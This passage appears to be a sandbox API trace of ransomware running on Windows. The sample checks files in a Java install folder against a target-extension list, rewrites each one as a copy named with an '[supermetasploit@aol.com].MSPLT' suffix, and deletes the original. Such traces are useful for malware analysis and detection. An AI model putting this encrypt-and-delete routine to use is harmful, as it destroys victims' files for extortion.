files\\java\\jre1.8.0_144\\lib\\resources.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.522] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3492573) returned 1 [0314.522] CloseHandle (hObject=0x3b0) returned 1 [0314.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar")) returned 0x20 [0314.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.523] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0314.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.523] lstrlenW (lpString=".doc") returned 4 [0314.523] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.523] lstrlenW (lpString=".docx") returned 5 [0314.523] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0314.523] lstrlenW (lpString=".pdf") returned 4 [0314.524] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.524] lstrlenW (lpString=".xls") returned 4 [0314.525] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.525] lstrlenW (lpString=".xlsx") returned 5 [0314.525] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0314.525] lstrlenW (lpString=".ppt") returned 4 [0314.525] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.526] lstrlenW (lpString=".zip") returned 4 [0314.526] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.526] lstrlenW (lpString=".rar") returned 4 [0314.526] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.526] lstrlenW (lpString=".bz2") returned 4 [0314.526] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.526] lstrlenW (lpString=".7z") returned 3 [0314.526] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.526] lstrlenW (lpString=".dbf") returned 4 [0314.526] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.526] lstrlenW (lpString=".1cd") returned 4 [0314.527] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.527] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.527] lstrlenW (lpString=".jpg") returned 4 [0314.527] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.527] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.527] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.527] lstrlenW (lpString=".doc") returned 4 [0314.527] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.527] lstrlenW (lpString=".docx") returned 5 [0314.527] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0314.527] lstrlenW (lpString=".pdf") returned 4 [0314.527] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.527] lstrlenW (lpString=".xls") returned 4 [0314.527] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.527] lstrlenW (lpString=".xlsx") returned 5 [0314.527] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0314.527] lstrlenW (lpString=".ppt") returned 4 [0314.527] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.527] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.527] lstrlenW (lpString=".zip") returned 4 [0314.528] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.528] lstrlenW (lpString=".rar") returned 4 [0314.528] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.528] lstrlenW (lpString=".bz2") returned 4 [0314.528] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.528] lstrlenW (lpString=".7z") returned 3 [0314.528] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.528] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.528] lstrlenW (lpString=".dbf") returned 4 [0314.528] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.528] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.528] lstrlenW (lpString=".1cd") returned 4 [0314.528] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.528] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 52 [0314.528] lstrlenW (lpString=".jpg") returned 4 [0314.528] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.529] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0314.529] lstrlenW (lpString="rt.jar") returned 6 [0314.529] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.530] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=54560347) returned 1 [0314.530] CloseHandle (hObject=0x3b0) returned 1 [0314.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar")) returned 0x20 [0314.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0314.531] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.531] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.531] lstrlenW (lpString=".doc") returned 4 [0314.531] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.531] lstrlenW (lpString=".docx") returned 5 [0314.531] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0314.531] lstrlenW (lpString=".pdf") returned 4 [0314.531] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.531] lstrlenW (lpString=".xls") returned 4 [0314.531] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.531] lstrlenW (lpString=".xlsx") returned 5 [0314.531] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0314.531] lstrlenW (lpString=".ppt") returned 4 [0314.531] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.531] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.531] lstrlenW (lpString=".zip") returned 4 [0314.531] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.532] lstrlenW (lpString=".rar") returned 4 [0314.532] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.532] lstrlenW (lpString=".bz2") returned 4 [0314.532] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.532] lstrlenW (lpString=".7z") returned 3 [0314.532] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.532] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.532] lstrlenW (lpString=".dbf") returned 4 [0314.532] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.532] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.532] lstrlenW (lpString=".1cd") returned 4 [0314.532] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.532] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.532] lstrlenW (lpString=".jpg") returned 4 [0314.532] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.532] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.533] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.533] lstrlenW (lpString=".doc") returned 4 [0314.533] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.533] lstrlenW (lpString=".docx") returned 5 [0314.533] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0314.533] lstrlenW (lpString=".pdf") returned 4 [0314.533] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.533] lstrlenW (lpString=".xls") returned 4 [0314.533] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.533] lstrlenW (lpString=".xlsx") returned 5 [0314.533] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0314.533] lstrlenW (lpString=".ppt") returned 4 [0314.533] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.533] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.533] lstrlenW (lpString=".zip") returned 4 [0314.533] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.533] lstrlenW (lpString=".rar") returned 4 [0314.533] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.533] lstrlenW (lpString=".bz2") returned 4 [0314.533] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.533] lstrlenW (lpString=".7z") returned 3 [0314.533] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.533] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.534] lstrlenW (lpString=".dbf") returned 4 [0314.534] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.534] lstrlenW (lpString=".1cd") returned 4 [0314.534] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 45 [0314.534] lstrlenW (lpString=".jpg") returned 4 [0314.534] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.534] lstrcmpiW (lpString1=".0_144\\lib\\security\\blacklist", lpString2=".MSPLT") returned -1 [0314.534] lstrlenW (lpString="blacklist") returned 9 [0314.534] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.541] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=4054) returned 1 [0314.541] CloseHandle (hObject=0x3b0) returned 1 [0314.541] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist")) returned 0x20 [0314.541] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.845] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.846] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.846] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.846] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0314.847] GetLastError () returned 0x0 [0314.847] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xfd6, lpOverlapped=0x0) returned 1 [0314.849] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xfe0, lpOverlapped=0x0) returned 1 [0314.851] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.851] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe6, lpOverlapped=0x0) returned 1 [0314.851] SetEndOfFile (hFile=0x53c) returned 1 [0314.851] CloseHandle (hObject=0x53c) returned 1 [0314.851] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.852] SetEndOfFile (hFile=0x540) returned 1 [0314.856] CloseHandle (hObject=0x540) returned 1 [0314.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.857] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist")) returned 1 [0314.858] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.858] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.858] lstrlenW (lpString=".doc") returned 4 [0314.858] lstrcmpiW (lpString1=".doc", lpString2="list") returned -1 [0314.858] lstrlenW (lpString=".docx") returned 5 [0314.858] lstrcmpiW (lpString1=".docx", lpString2="klist") returned -1 [0314.858] lstrlenW (lpString=".pdf") returned 4 [0314.858] lstrcmpiW (lpString1=".pdf", lpString2="list") returned -1 [0314.858] lstrlenW (lpString=".xls") returned 4 [0314.858] lstrcmpiW (lpString1=".xls", lpString2="list") returned -1 [0314.858] lstrlenW (lpString=".xlsx") returned 5 [0314.858] lstrcmpiW (lpString1=".xlsx", lpString2="klist") returned -1 [0314.858] lstrlenW (lpString=".ppt") returned 4 [0314.858] lstrcmpiW (lpString1=".ppt", lpString2="list") returned -1 [0314.858] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.858] lstrlenW (lpString=".zip") returned 4 [0314.858] lstrcmpiW (lpString1=".zip", lpString2="list") returned -1 [0314.858] lstrlenW (lpString=".rar") returned 4 [0314.858] lstrcmpiW (lpString1=".rar", lpString2="list") returned -1 [0314.858] lstrlenW (lpString=".bz2") returned 4 [0314.858] lstrcmpiW (lpString1=".bz2", lpString2="list") returned -1 [0314.858] lstrlenW (lpString=".7z") returned 3 [0314.858] lstrcmpiW (lpString1=".7z", lpString2="ist") returned -1 [0314.858] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.858] lstrlenW (lpString=".dbf") returned 4 [0314.858] lstrcmpiW (lpString1=".dbf", lpString2="list") returned -1 [0314.858] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.859] lstrlenW (lpString=".1cd") returned 4 [0314.859] lstrcmpiW (lpString1=".1cd", lpString2="list") returned -1 [0314.859] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.859] lstrlenW (lpString=".jpg") returned 4 [0314.859] lstrcmpiW (lpString1=".jpg", lpString2="list") returned -1 [0314.859] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.859] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.859] lstrlenW (lpString=".doc") returned 4 [0314.859] lstrcmpiW (lpString1=".doc", lpString2="list") returned -1 [0314.859] lstrlenW (lpString=".docx") returned 5 [0314.859] lstrcmpiW (lpString1=".docx", lpString2="klist") returned -1 [0314.859] lstrlenW (lpString=".pdf") returned 4 [0314.859] lstrcmpiW (lpString1=".pdf", lpString2="list") returned -1 [0314.859] lstrlenW (lpString=".xls") returned 4 [0314.859] lstrcmpiW (lpString1=".xls", lpString2="list") returned -1 [0314.859] lstrlenW (lpString=".xlsx") returned 5 [0314.859] lstrcmpiW (lpString1=".xlsx", lpString2="klist") returned -1 [0314.859] lstrlenW (lpString=".ppt") returned 4 [0314.859] lstrcmpiW (lpString1=".ppt", lpString2="list") returned -1 [0314.859] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.859] lstrlenW (lpString=".zip") returned 4 [0314.859] lstrcmpiW (lpString1=".zip", lpString2="list") returned -1 [0314.859] lstrlenW (lpString=".rar") returned 4 [0314.859] lstrcmpiW (lpString1=".rar", lpString2="list") returned -1 [0314.859] lstrlenW (lpString=".bz2") returned 4 [0314.859] lstrcmpiW (lpString1=".bz2", lpString2="list") returned -1 [0314.859] lstrlenW (lpString=".7z") returned 3 [0314.859] lstrcmpiW (lpString1=".7z", lpString2="ist") returned -1 [0314.859] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.859] lstrlenW (lpString=".dbf") returned 4 [0314.860] lstrcmpiW (lpString1=".dbf", lpString2="list") returned -1 [0314.860] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.860] lstrlenW (lpString=".1cd") returned 4 [0314.860] lstrcmpiW (lpString1=".1cd", lpString2="list") returned -1 [0314.860] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 57 [0314.860] lstrlenW (lpString=".jpg") returned 4 [0314.860] lstrcmpiW (lpString1=".jpg", lpString2="list") returned -1 [0314.860] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0314.860] lstrlenW (lpString="US_export_policy.jar") returned 20 [0314.860] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.861] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3026) returned 1 [0314.861] CloseHandle (hObject=0x540) returned 1 [0314.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar")) returned 0x20 [0314.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.861] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.861] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.862] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.862] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0314.862] GetLastError () returned 0x0 [0314.862] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xbd2, lpOverlapped=0x0) returned 1 [0314.865] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xbe0, lpOverlapped=0x0) returned 1 [0314.866] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.866] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xfc, lpOverlapped=0x0) returned 1 [0314.867] SetEndOfFile (hFile=0x53c) returned 1 [0314.867] CloseHandle (hObject=0x53c) returned 1 [0314.867] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.867] SetEndOfFile (hFile=0x540) returned 1 [0314.871] CloseHandle (hObject=0x540) returned 1 [0314.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.872] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar")) returned 1 [0314.872] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.872] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.872] lstrlenW (lpString=".doc") returned 4 [0314.872] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.873] lstrlenW (lpString=".docx") returned 5 [0314.873] lstrcmpiW (lpString1=".docx", lpString2="y.jar") returned -1 [0314.873] lstrlenW (lpString=".pdf") returned 4 [0314.873] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.873] lstrlenW (lpString=".xls") returned 4 [0314.873] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.873] lstrlenW (lpString=".xlsx") returned 5 [0314.873] lstrcmpiW (lpString1=".xlsx", lpString2="y.jar") returned -1 [0314.873] lstrlenW (lpString=".ppt") returned 4 [0314.873] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.873] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.873] lstrlenW (lpString=".zip") returned 4 [0314.873] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.873] lstrlenW (lpString=".rar") returned 4 [0314.873] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.873] lstrlenW (lpString=".bz2") returned 4 [0314.873] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.873] lstrlenW (lpString=".7z") returned 3 [0314.873] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.873] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.873] lstrlenW (lpString=".dbf") returned 4 [0314.873] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.873] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.873] lstrlenW (lpString=".1cd") returned 4 [0314.874] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.874] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.874] lstrlenW (lpString=".jpg") returned 4 [0314.874] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.874] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.874] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.874] lstrlenW (lpString=".doc") returned 4 [0314.874] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.874] lstrlenW (lpString=".docx") returned 5 [0314.874] lstrcmpiW (lpString1=".docx", lpString2="y.jar") returned -1 [0314.874] lstrlenW (lpString=".pdf") returned 4 [0314.874] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.874] lstrlenW (lpString=".xls") returned 4 [0314.874] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.874] lstrlenW (lpString=".xlsx") returned 5 [0314.874] lstrcmpiW (lpString1=".xlsx", lpString2="y.jar") returned -1 [0314.874] lstrlenW (lpString=".ppt") returned 4 [0314.874] 